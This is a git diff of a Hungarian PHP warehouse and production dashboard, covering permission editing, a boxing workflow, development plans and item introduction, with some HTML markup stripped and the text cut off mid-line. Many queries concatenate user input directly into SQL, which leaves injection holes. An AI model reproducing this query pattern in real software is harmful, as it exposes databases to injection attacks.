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"); + background-size: 1000px 100px; +} +section .wave.wave1 { + animation: wave1 15s linear infinite; + z-index: 1000; + opacity: 1; + animation-delay: 0s; + bottom: 0; +} +section .wave.wave2 { + animation: wave2 15s linear infinite; + z-index: 999; + opacity: 0.8; + animation-delay: -5s; + bottom: 10px; +} +section .wave.wave3 { + animation: wave1 30s linear infinite; + z-index: 998; + opacity: 0.2; + animation-delay: -2s; + bottom: 15; +} +section .wave.wave4 { + animation: wave2 20s linear infinite; + z-index: 997; + opacity: 0.5; + animation-delay: -5s; + bottom: 20px; +} +@keyframes wave1 { + 0% + { + background-position-x: 0; + } + 100% + { + background-position: 1000px; + } +} +@keyframes wave2 { + 0% + { + background-position-x: 0; + } + 100% + { + background-position: -1000px; + } +} diff --git a/css/panel.css b/css/panel.css new file mode 100644 index 0000000..e69de29 diff --git a/css/panelupdater.php b/css/panelupdater.php new file mode 100644 index 0000000..83814e5 --- /dev/null +++ b/css/panelupdater.php @@ -0,0 +1,99 @@ + "#2980b9", //Default: #2980b9 + "bgcolor" => "#f5f5f5", //Default: #f5f5f5 + "toppanel" => "#ffffff" //Default: #ffffff +]; + +//Custom CSS + +$CustomCSS = file_get_contents("custom_panel.css"); + +/* +==== End Settings ==== + + + + +--- Check and update --- +*/ + +$newestversion = file_get_contents("https://api.kjokmjnoi.hu/css/panel.css").$CustomCSS; +$currentversion = file_get_contents($localfile); +$version = substr($newestversion, 70, 14); + +foreach ($ColorSettings as $name => $value) { + $rootcolorname = "--".$name.": "; + $rootcolorname_pos = strpos($newestversion, $rootcolorname); + + $rootvalue = ""; + if ($rootcolorname_pos !== false) { + $colorvalue_pos = strpos($newestversion, ";", $rootcolorname_pos); + if ($colorvalue_pos !== false) { + $rootvalue = substr($newestversion, $rootcolorname_pos, $colorvalue_pos - $rootcolorname_pos + 1); + } else { + $rootvalue = substr($newestversion, $rootcolorname_pos); + } + } + + if ($rootvalue == "") { + echo "Error, There is no color value under the name '".$name."'
"; + } else { + $newrootvalue = $rootcolorname.$value.";"; + if ($newrootvalue != $rootvalue) { + $newestversion = str_replace($rootvalue, $newrootvalue, $newestversion); + echo "Color Setting: ".$rootvalue." -> ".$newrootvalue."
"; + } + } +} + +if ($newestversion != $currentversion) { + if (substr($newestversion, 7, 22) == "@license kjokmjnoi API") { + echo "Update design...."; + $designfile = fopen($localfile, "w") or die("Unable to open css file!"); + fwrite($designfile, $newestversion); + fclose($designfile); + echo "

Update finised!
"; + print_r($version); + } else { + $version = substr($currentversion, 70, 14); + echo "The Design was been removed or temporarily unavailable.

Update failed!"; + print_r($version); + echo " (Not synced)"; + } +} else { + echo "The Design is on newest version.

"; + print_r($version); +} + +?> diff --git a/dashboard/addperm.php b/dashboard/addperm.php new file mode 100644 index 0000000..43586b5 --- /dev/null +++ b/dashboard/addperm.php @@ -0,0 +1,182 @@ +encode($_POST['short_name'] ?? '', 'HA98'); + $perm_desc = $coderclass->encode($_POST['perm_desc'] ?? '', 'H3AH'); + $perm_status = $_POST['perm_status'] ?? ''; + $perm_category = $_POST['perm_category'] ?? ''; + $risk_factor = $_POST['risk_factor'] ?? ''; + + $sql = mysqli_query($conn,"SELECT perm_id FROM perm_database WHERE perm_id = '".$perm_id."'"); + if(!mysqli_fetch_array($sql)) { + $sql = mysqli_query($conn,"INSERT INTO perm_database (perm_id, short_name, perm_desc, perm_status, perm_category, risk_factor) VALUES ('$perm_id', '$short_name', '$perm_desc', '$perm_status', '$perm_category', '$risk_factor')"); + echo ""; + } else { + $sql = mysqli_query($conn,"UPDATE perm_database SET short_name='$short_name', perm_desc='$perm_desc', perm_status='$perm_status', perm_category='$perm_category', risk_factor='$risk_factor' WHERE perm_id = '$perm_id'"); + echo ""; + } +} + +$anticsrfid = bin2hex(random_bytes(24)); +$_SESSION["anticsrfid"] = $anticsrfid; +?> + + + + + Jog hozzáadása + + + +
+

Jogosultság hozzáadása

+ +
+ + +
+ +
+ + +
+ +
+ + +
+ +
+ + +
+ +
+ + + + query($query)) { + while ($warehouse = $result->fetch_assoc()) { + echo ' +
+ +
+ + +
+ + + +
+ + + + + + diff --git a/dashboard/boxing.php b/dashboard/boxing.php new file mode 100644 index 0000000..8009a20 --- /dev/null +++ b/dashboard/boxing.php @@ -0,0 +1,1242 @@ +5 db / oszlop + + + + + "; + $perpageselect = str_replace("value='".$maxperpage."'", "value='".$maxperpage."' selected", $perpageselect); + + $json = json_encode(array( + 'perpage' => $perpageselect, + 'result' => 'ok' + )); + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "table") { + $maxperpage = intval(htmlspecialchars($_POST['perpage'] ?? 25)); + $cpage = intval(htmlspecialchars($_POST['cpage'] ?? 1)); + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id']) ?? ''); + $category = htmlspecialchars($_POST['category'] ?? ''); + + if ($maxperpage < 1) $maxperpage = 25; + if ($cpage < 1) $cpage = 1; + setcookie("maxperpage", $maxperpage, time() + 86400*90, "/"); + $maxperpage = $maxperpage / 5; + $offset = max(0, ($cpage - 1) * $maxperpage); + + $item_filter = ''; + if (!empty($item_id)) { + $item_filter = " AND item_id LIKE '%" . mysqli_real_escape_string($conn, $item_id) . "%'"; + } + + $tables = ['boxing']; + $results_by_stage = []; + + $all_items = []; + for ($stage = 1; $stage <= 2; $stage++) { + $stage_results = []; + $union_parts = []; + foreach ($tables as $t) { + $union_parts[] = "(SELECT pr_id, item_id, stage, date_start, db_start, '$t' AS category + FROM production_{$t} + WHERE stage=$stage $item_filter)"; + } + $sql = "SELECT * FROM (" . implode(" UNION ALL ", $union_parts) . ") AS u"; + $res = mysqli_query($conn, $sql); + while ($res && $row = mysqli_fetch_assoc($res)) { + $hasCategoryPerm = UserHasPerm('production_' . $row['category']); + $hasStagePerm = ($row['stage'] == 1) ? UserHasPerm('production_prep') : UserHasPerm('warehouse_add'); + $rowHasPerm = $hasCategoryPerm && $hasStagePerm; + + $amount_in_wh = 0; + $item_id_val = $row['item_id']; + $daily_sql = mysqli_query($conn, "SELECT free_stock FROM statistics_daily WHERE item_id = '$item_id_val'"); + $daily_stat = mysqli_fetch_array($daily_sql); + if ($daily_stat != null) { + $amount_in_wh = intval($daily_stat['free_stock']); + } + + $stage_results[] = [ + 'pr_id' => $row['pr_id'], + 'item_id' => $row['item_id'], + 'stage' => intval($row['stage']), + 'category' => $row['category'], + 'db_start' => $row['db_start'], + 'hasperm' => $rowHasPerm, + 'amount_in_wh' => $amount_in_wh + ]; + } + + usort($stage_results, function($a, $b) { + return $a['amount_in_wh'] <=> $b['amount_in_wh']; + }); + + $results_by_stage[$stage] = $stage_results; + } + + $final_results = []; + $pages_per_stage = []; + + foreach ($results_by_stage as $stage => $stage_data) { + $total_in_stage = count($stage_data); + $pages_per_stage[$stage] = $total_in_stage > 0 ? ceil($total_in_stage / $maxperpage) : 1; + + $offset = max(0, ($cpage - 1) * $maxperpage); + $sliced = array_slice($stage_data, $offset, $maxperpage); + $final_results = array_merge($final_results, $sliced); + } + + $maxpage = max($pages_per_stage); + + $response = [ + 'result' => 'ok', + 'data' => $final_results, + 'cpage' => $cpage, + 'maxpage' => $maxpage + ]; + echo json_encode($response); + } else if (htmlspecialchars($_POST["func"]) == "openDetails") { + $productionId = htmlspecialchars($_POST['productionId'] ?? ''); + $productionId = mysqli_real_escape_string($conn, $productionId); + + $sql = "SELECT * FROM production_boxing WHERE pr_id = '$productionId'"; + $result = mysqli_query($conn, $sql); + if (!$result) { + echo json_encode(['result' => 'Adatbázis hiba']); + exit; + } + + $data = []; + while ($row = mysqli_fetch_assoc($result)) { + $data[] = $row; + } + + echo json_encode(['result' => 'ok', 'data' => $data]); + + } else if (htmlspecialchars($_POST["func"]) == "SearchTable") { + $maxperpage = intval(htmlspecialchars($_POST["perpage"])); + $cpage = intval(htmlspecialchars($_POST["cpage"])); + + $start_datetime = htmlspecialchars($_POST["start_datetime"]); + $end_datetime = htmlspecialchars($_POST["end_datetime"]); + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + + $addquery = ""; + $isfirst = true; + + if ($cpage == 0) { + $cpage = 1; + } + setcookie("maxperpage", $maxperpage, time() + (86400 * 90), "/"); + + if ($start_datetime != "") { + $timestamp = strtotime($start_datetime); + + $addquery = $addquery." WHERE date_warehouseend > '".$timestamp."'"; + $isfirst = false; + + } + + if ($end_datetime != "") { + $timestamp = strtotime($end_datetime); + + if ($isfirst) { + $addquery = $addquery." WHERE date_warehouseend < '".$timestamp."'"; + $isfirst = false; + } else { + $addquery = $addquery." and date_warehouseend < '".$timestamp."'"; + } + } + + if ($item_id != "") { + if ($isfirst) { + $addquery = $addquery." WHERE item_id LIKE '%".$item_id."%'"; + $isfirst = false; + } else { + $addquery = $addquery." and item_id LIKE '%".$item_id."%'"; + } + } + + if ($isfirst) { + $addquery = $addquery." WHERE stage = 0"; + $isfirst = false; + } else { + $addquery = $addquery." and stage = 0"; + } + + $table = "production_boxing"; + + $sql = mysqli_query($conn,"SELECT COUNT(*) FROM ".$table.$addquery); + $count = mysqli_fetch_array($sql)[0]; + + $addquery = $addquery." ORDER BY date_warehouseend DESC"; + + $maxpage = ceil($count / $maxperpage); + if (!($cpage >= 1 && $cpage <= $maxpage)) { + $cpage = 1; + } + + $limit = ($cpage - 1) * $maxperpage; + + $responseStr = ''; + + $query = "SELECT pr_id, item_id, db_revenue, date_start, date_warehouseend FROM $table".$addquery." LIMIT $limit, $maxperpage"; + if ($result = $conn->query($query)) { + while ($c_prod = $result->fetch_assoc()) { + + if ($responseStr != "") { + $responseStr .= "|%|"; + } + $responseStr .= $c_prod['item_id'].'/!/'.date("Y. m. d.", $c_prod['date_start']).'/!/'.date("Y. m. d.", $c_prod['date_warehouseend']).'/!/'.$c_prod['db_revenue'].'/!/'.$c_prod['pr_id']; + } + } + + echo '{"result": "ok", "data": "'.$responseStr.'", "maxpage": "'.$maxpage.'", "cpage": "'.$cpage.'"}'; + + } else if (htmlspecialchars($_POST["func"]) == "RefreshDbStart") { + $productionId = htmlspecialchars($_POST['productionId'] ?? ''); + $productionId = mysqli_real_escape_string($conn, $productionId); + + $item_id = ""; + + $sql = "SELECT item_id FROM production_boxing WHERE pr_id = '$productionId'"; + $result = mysqli_query($conn, $sql); + if (!$result) { + echo json_encode(['result' => 'Adatbázis hiba']); + exit; + } + $item_id = mysqli_fetch_assoc($result)['item_id']; + + $annual_result = mysqli_query($conn, "SELECT * FROM statistics_annual WHERE item_id = '$item_id' AND year = (SELECT MAX(year) FROM statistics_annual WHERE item_id = '$item_id') LIMIT 1"); + $statistics_annual = mysqli_fetch_assoc($annual_result); + + $sql = mysqli_query($conn,"SELECT warehouse_total, warehouse_box FROM statistics_daily WHERE item_id = '$item_id'"); + $statistics_daily = mysqli_fetch_array($sql); + + $sql = mysqli_query($conn,"SELECT * FROM system_params"); + $system_params = []; + while ($row = mysqli_fetch_assoc($sql)) { + $system_params[$row['param_key']] = $row['param_value']; + } + + $in_foil_warehouse = intval($statistics_daily['warehouse_total']) - intval($statistics_daily['warehouse_box']); + $daily_consumption = ($statistics_annual["total_consumption"] ?? $system_params["default_total_consumption"]) / 365; + $need_to_box = intval($system_params['box_holding']) * $daily_consumption - intval($statistics_daily['warehouse_box']); + + $min_db = min(max(5, ceil($need_to_box)), $in_foil_warehouse); + + $sql = mysqli_query($conn,"UPDATE production_boxing SET db_start = '$min_db' WHERE pr_id = '$productionId'"); + echo json_encode(['result' => 'ok', 'db_start' => $min_db]); + + } + + exit(); +} + + +$WarehouseLocSelect = ''; +$query = "SELECT DISTINCT location FROM warehouse_structure ORDER BY location ASC"; +if ($result = $conn->query($query)) { + while ($warehouse = $result->fetch_assoc()) { + $WarehouseLocSelect = $WarehouseLocSelect.''; + } +} +?> + + + + + + + + Kezelőfelület + + + + +
+
+

Title

+
+
+
+
+
+
+
+
+
+ + + +

Termékdobozolás

+ +
+
+

Cikkszám:

+ +
+

Oldalanként:

+ +
+

:

+ +
+
+ +
+
+
+ +
+ +
Előkészítés
+
Raktározás
+ +
+ +
+
+

<    0 / 0    >

+
+ + +
+ +
+
+

Lezárt dobozolási folyamatok áttekintése

+
+ +
+
+

Cikkszám:

+ +
+

Lezárás időtartam kezdet:

+ +
+

Lezárás időtartam vége:

+ +
+

Oldalanként:

+ +
+

:

+ +
+
+ +
+
+
+ +
+
+ + + + + + + + + + + + +
CikkszámKezdési dátumLezárás dátumDobozolt darabszám DobozszámAdatlap
+
+
+ +
+
+

<    0 / 0    >

+
+ +
+ +


+ + + +
+ + + + diff --git a/dashboard/devplan.php b/dashboard/devplan.php new file mode 100644 index 0000000..da39d5e --- /dev/null +++ b/dashboard/devplan.php @@ -0,0 +1,475 @@ + []]); + } + exit; + } + + if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_GET['action']) && $_GET['action'] === 'save') { + ensureDirectory($jsonFile); + + $input = file_get_contents('php://input'); + $data = json_decode($input, true); + + if (json_last_error() === JSON_ERROR_NONE) { + file_put_contents($jsonFile, json_encode($data, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE)); + echo json_encode(['success' => true]); + } else { + http_response_code(400); + echo json_encode(['success' => false, 'error' => 'Hibás JSON formátum']); + } + exit; + } + + if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_GET['action']) && $_GET['action'] === 'complete') { + $input = file_get_contents('php://input'); + $data = json_decode($input, true); + + if (json_last_error() !== JSON_ERROR_NONE || !isset($data['index'])) { + http_response_code(400); + echo json_encode(['success' => false, 'error' => 'Hibás JSON formátum']); + exit; + } + + $index = (int)$data['index']; + + // Devplan betöltése + ensureDirectory($jsonFile); + $devplanData = ['plans' => []]; + if (file_exists($jsonFile)) { + $content = file_get_contents($jsonFile); + $devplanData = json_decode($content, true); + if (!is_array($devplanData) || !isset($devplanData['plans'])) { + $devplanData = ['plans' => []]; + } + } + + if (!isset($devplanData['plans'][$index])) { + http_response_code(400); + echo json_encode(['success' => false, 'error' => 'Érvénytelen index']); + exit; + } + + $planName = $devplanData['plans'][$index]; + + // Version.json betöltése + $versionFile = __DIR__ . '/../managers/version.json'; + $versionData = ['updates' => []]; + if (file_exists($versionFile)) { + $versionContent = file_get_contents($versionFile); + $versionData = json_decode($versionContent, true); + if (!is_array($versionData) || !isset($versionData['updates'])) { + $versionData = ['updates' => []]; + } + } + + // Legutóbbi build szám használata + if (empty($versionData['updates'])) { + http_response_code(400); + echo json_encode(['success' => false, 'error' => 'Nincs meglévő build szám']); + exit; + } + + $build = $versionData['updates'][0]['build']; + + // Changelog bejegyzés hozzáadása a legutóbbi buildhez + if (!in_array($planName, $versionData['updates'][0]['changes'], true)) { + array_unshift($versionData['updates'][0]['changes'], $planName); + } + + // Version.json mentése + file_put_contents($versionFile, json_encode($versionData, JSON_UNESCAPED_UNICODE | JSON_PRETTY_PRINT)); + + // Terv törlése a devplan.json-ból + array_splice($devplanData['plans'], $index, 1); + file_put_contents($jsonFile, json_encode($devplanData, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE)); + + echo json_encode(['success' => true, 'build' => $build]); + exit; + } + + http_response_code(400); + echo json_encode(['success' => false, 'error' => 'Hibás kérés']); + + exit; +} else { + $CanEdit = false; + $localIP = trim(shell_exec('hostname -I | cut -d" " -f1')); + + if (UserHasPerm("god_profile") && $userID == 1 && $localIP == '192.168.15.10') { + $CanEdit = true; + } +} +?> + + + + + + Fejlesztési Tervek + + + +
+
+

Fejlesztési Tervek

+
    +
    +
    + + +
    +
    +
    + + + + diff --git a/dashboard/index.php b/dashboard/index.php new file mode 100644 index 0000000..94bc5e1 --- /dev/null +++ b/dashboard/index.php @@ -0,0 +1,139 @@ +generateKey(); + $totpQRCode = 'otpauth://totp/Szaturnusz?secret='.$totpKey.'&issuer=saturn&algorithm=SHA1&digits=6&period=30'; + + + $anticsrfid = bin2hex(random_bytes(24)); + $_SESSION["anticsrfid"] = $anticsrfid; + + $menuhtml = str_replace('', '', $menuhtml); +} + +?> + + + + + + + Kezelőfelület + + + +
    +
    +

    Title

    +
    +
    +
    +
    +
    +
    +
    +
    +
    + + + + + + + +
    + + ';}?> + + + diff --git a/dashboard/itemcreator.php b/dashboard/itemcreator.php new file mode 100644 index 0000000..e0870c5 --- /dev/null +++ b/dashboard/itemcreator.php @@ -0,0 +1,1967 @@ +query($query)) { + while ($introduction = $result->fetch_assoc()) { + $user_can_edit = 2; + $status_text = ""; + + if (UserHasPerm('read_item_introduction')) {$user_can_edit = 3;} + + if ($introduction["status"] == "basic_data") {if (UserHasPerm('edit_item_introduction_basic_data')) {$user_can_edit = 1;}$status_text = "Alap adatok feltöltése";} + if ($introduction["status"] == "tools_send") {if (UserHasPerm('edit_item_introduction_tools_send')) {$user_can_edit = 1;}$status_text = "Szerszámtervek vágásra továbbküldve";} + if ($introduction["status"] == "testing") {if (UserHasPerm('edit_item_introduction_testing')) {$user_can_edit = 1;}$status_text = "Termékpróba szakasz";} + if ($introduction["status"] == "deficit") {if (UserHasPerm('edit_item_introduction_basic_data')) {$user_can_edit = 1;}$status_text = "Adatpótlási szakasz";} + if ($introduction["status"] == "last_statement") {if (UserHasPerm('edit_item_introduction_basic_data')) {$user_can_edit = 1;}$status_text = "Végső nyilatkozatok beküldése";} + if ($introduction["status"] == "final") {if (UserHasPerm('edit_item_introduction_final')) {$user_can_edit = 1;}$status_text = "Végső ellenőrzés";} + + $IntroductionItems[] = [ + "item_id" => $introduction["item_id"], + "status" => $status_text, + "user_can_edit" => $user_can_edit + ]; + + } + } + + usort($IntroductionItems, function ($a, $b) {return strcoll($a["user_can_edit"], $b["user_can_edit"]);}); + + $responseStr = ''; + for ($i=0; $i < count($IntroductionItems); $i++) { + if ($responseStr != "") { + $responseStr = $responseStr."|%|"; + } + + $responseStr = $responseStr.$IntroductionItems[$i]['item_id'].'||'.$IntroductionItems[$i]['status'].'||'.$IntroductionItems[$i]['user_can_edit']; + } + + echo '{"status": "ok", "data": "'.$responseStr.'"}'; + + } else if (htmlspecialchars($_POST["func"]) == "SaveNewIntroduction") { + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + $json = ""; + + $sql = mysqli_query($conn,"SELECT name_in_db FROM pr_parameters WHERE item_id = '$item_id'"); + $pr_parameters = mysqli_fetch_array($sql); + + $sql = mysqli_query($conn,"SELECT status FROM item_introduction WHERE item_id = '$item_id'"); + $item_introduction = mysqli_fetch_array($sql); + + if ($item_id == "") { + $json = json_encode(["status" => "error", "message" => "Kötelező egy cikkszámot megadni!"]); + } else if ($pr_parameters) { + $json = json_encode(["status" => "error", "message" => "A megadott cikkszámmal, már létezik Termék!"]); + } else if ($item_introduction) { + $json = json_encode(["status" => "error", "message" => "A megadott cikkszámmal, már megkezdődött a bevezetési folyamat!"]); + } else if(!UserHasPerm('edit_item_introduction_basic_data')) { + $json = json_encode(["status" => "error", "message" => "Jogosultság megtagadva! Önnek nincsen joga termék bevezetést elkezdeni!"]); + } else { + $sql = mysqli_query($conn,"INSERT INTO item_introduction(item_id, status) VALUES ('$item_id', 'basic_data')"); + $json = json_encode(["status" => "ok"]); + } + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "OpenIntroduction") { + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + $json = ""; + + $sql = mysqli_query($conn,"SELECT status FROM item_introduction WHERE item_id = '$item_id'"); + $item_introduction = mysqli_fetch_array($sql); + + if ($item_introduction) { + $json = json_encode(["status" => "ok", "current_stage" => $item_introduction["status"]]); + } else { + $json = json_encode(["status" => "error", "message" => "A megadott cikkszámmal nem létezik bevezetési folyamat!"]); + } + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "StartToolsSend") { + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + $json = ""; + + if (UserHasPerm('edit_item_introduction_basic_data')) { + $json = json_encode(["status" => "ok"]); + $sql = mysqli_query($conn,"UPDATE item_introduction SET status = 'tools_send' WHERE item_id = '$item_id'"); + } else { + $json = json_encode(["status" => "error", "message" => "Jogosultság megtagadva! Önnek nincsen joga alap adatokat menteni!"]); + } + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "OpenBasicData") { + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + $json = ""; + $IsUserCanEdit = UserHasPerm('edit_item_introduction_basic_data'); + $all_product_information = array(); + + $data = json_decode(file_get_contents($currentUrl."/managers/prdb.json"), true); + if ($data) { + foreach ($data["DBList"] as $table) { + + $sql = mysqli_query($conn,"SELECT item_id FROM ".$table["ID"]." WHERE item_id = '$item_id'"); + $test = mysqli_fetch_array($sql); + + if ($test) { + //Ha létezik már adat erről a cikkszámról + $query = "SELECT * FROM ".$table["ID"]." WHERE item_id = '$item_id'"; + if ($result = $conn->query($query)) { + while ($dbdata = $result->fetch_assoc()) { + foreach ($data["Parameters"] as $param) { + if (strpos($param["ID"], $table['ID'] . "_") === 0) { + $newID = substr($param["ID"], strlen($table['ID']) + 1); + $all_product_information = array_merge($all_product_information, [$param["ID"] => $param["NAME"]."||".$dbdata[$newID]]); + + if ($param["DATALIST"]) { + $query = "SELECT DISTINCT $newID FROM ".$table["ID"]." ORDER BY $newID ASC"; + $GeneratedDatalist = ""; + if ($result = $conn->query($query)) { + while ($datalist = $result->fetch_assoc()) { + $GeneratedDatalist .= ''; + } + } + + $all_product_information = array_merge($all_product_information, [$param["ID"]."_datalist" => $GeneratedDatalist]); + } else { + $all_product_information = array_merge($all_product_information, [$param["ID"]."_datalist" => ""]); + } + } + } + + $uploader_uid = $dbdata["uploader_uid"]; + $sql = mysqli_query($conn,"SELECT full_name FROM users WHERE uid = '$uploader_uid'"); + $userUploaderName = $coderclass->decode(mysqli_fetch_array($sql)[0], "TIT4"); + $all_product_information = array_merge($all_product_information, [$table['ID'] => $table["NAME"]]); + $all_product_information = array_merge($all_product_information, [$table['ID'].'_can_see' => true]); + $all_product_information = array_merge($all_product_information, [$table['ID'].'_can_edit' => $IsUserCanEdit]); + + } + } + } else { + //Ha még nem létezik adat ebben a táblában a cikkszámról + foreach ($data["Parameters"] as $param) { + if (strpos($param["ID"], $table['ID'] . "_") === 0) { + $newID = substr($param["ID"], strlen($table['ID']) + 1); + $all_product_information = array_merge($all_product_information, [$param["ID"] => $param["NAME"]."||+"]); + $all_product_information = array_merge($all_product_information, [$table['ID'] => $table["NAME"]]); + $all_product_information = array_merge($all_product_information, [$table['ID'].'_can_see' => true]); + $all_product_information = array_merge($all_product_information, [$table['ID'].'_can_edit' => $IsUserCanEdit]); + + if ($param["DATALIST"]) { + $query = "SELECT DISTINCT $newID FROM ".$table["ID"]." ORDER BY $newID ASC"; + $GeneratedDatalist = ""; + if ($result = $conn->query($query)) { + while ($datalist = $result->fetch_assoc()) { + $GeneratedDatalist .= ''; + } + } + + $all_product_information = array_merge($all_product_information, [$param["ID"]."_datalist" => $GeneratedDatalist]); + } else { + $all_product_information = array_merge($all_product_information, [$param["ID"]."_datalist" => ""]); + } + + } + } + } + + } + + $all_product_information = array_merge($all_product_information, ["status" => "ok", 'item_id' => $item_id]); + $json = json_encode($all_product_information); + } + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "OpenToolsSend") { + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + $json = ""; + + $sql = mysqli_query($conn,"SELECT is_tool_ok, is_tool_created, is_tool_can_be_tested FROM item_introduction WHERE item_id = '$item_id'"); + $item_introduction = mysqli_fetch_array($sql); + + if ($item_introduction) { + + $is_tool_ok = ''; + $is_tool_created = ''; + $is_tool_can_be_tested = ''; + + if ($item_introduction["is_tool_ok"] != null && $item_introduction["is_tool_ok"] != "") { + $is_tool_ok_uid = explode("|", $item_introduction["is_tool_ok"])[0]; + $sql = mysqli_query($conn,"SELECT full_name FROM users WHERE uid = '$is_tool_ok_uid'"); + $is_tool_ok_name = $coderclass->decode(mysqli_fetch_array($sql)[0], "TIT4"); + $is_tool_ok_time = explode("|", $item_introduction["is_tool_ok"])[1]; + + $is_tool_ok = $is_tool_ok_name." - ".date("Y-m-d H:i:s", $is_tool_ok_time); + } + + if ($item_introduction["is_tool_created"] != null && $item_introduction["is_tool_created"] != "") { + $is_tool_created_uid = explode("|", $item_introduction["is_tool_created"])[0]; + $sql = mysqli_query($conn,"SELECT full_name FROM users WHERE uid = '$is_tool_created_uid'"); + $is_tool_created_name = $coderclass->decode(mysqli_fetch_array($sql)[0], "TIT4"); + $is_tool_created_time = explode("|", $item_introduction["is_tool_created"])[1]; + + $is_tool_created = $is_tool_created_name." - ".date("Y-m-d H:i:s", $is_tool_created_time); + } + + if ($item_introduction["is_tool_can_be_tested"] != null && $item_introduction["is_tool_can_be_tested"] != "") { + $is_tool_can_be_tested_uid = 